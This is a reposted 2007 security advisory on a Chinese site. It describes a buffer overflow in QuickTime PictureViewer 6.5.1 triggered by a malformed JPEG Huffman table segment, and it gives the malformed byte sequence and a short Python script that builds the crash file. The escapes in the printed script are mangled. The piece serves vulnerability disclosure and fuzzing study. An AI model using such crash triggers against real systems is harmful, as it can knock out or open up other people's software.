 |
QuickTime malformed JPEG缓冲区溢出! |
|
|
| QuickTime malformed JPEG缓冲区溢出! |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 10:58:34 |
|
When fuzzing some application with malformed input files, if we want to discover some /
vulnerability we have to create input file which is very close to valid file but yet /
malformed in some way. In that way chances for discovery are greater. Now let’s play /
with JPEG format. We concentrate on Huffman table segment. Marker for DHT is 0xffc4.
Now, take valid JPEG file and replace first DHT with this malformed DHT:
0xffc4021100ffff000000000000+0x01*510
Open this modified file with QuickTime PictureViewer (version 6.5.1) for Windows and /
QuickTime will crash with Windows reporting access violation error. Next step would /
be creating exploit, but I leave that to people with more skill in doing that.
Here is quick and dirty script in Python for creating such malformed file:
import struct
f=open(raw_input("enter the path to the input file:/n"),"rb")
a=f.read()
f.close()
n=a.index("/xff/xc4")
b=a[:n]+"/xff/xc4/x02/x11/x00/xff/xff"+"/x00"*14+"/x01"*510
+a[n+2+struct.unpack("!H",a[n+2:n+4])[0]:]
f=open(raw_input("enter the path to the output file:/n"),"wb")
f.write(b)
f.close()
For details about JPEG format take a look at:
http://www.w3.org/Graphics/JPEG/itu-t81.pdf 【转自世纪安全网 http://www.21safe.com】
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: 在PHP中执行系统外部命令
下一篇文章: 解决因种子消失而无法继续BT下载的问题 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
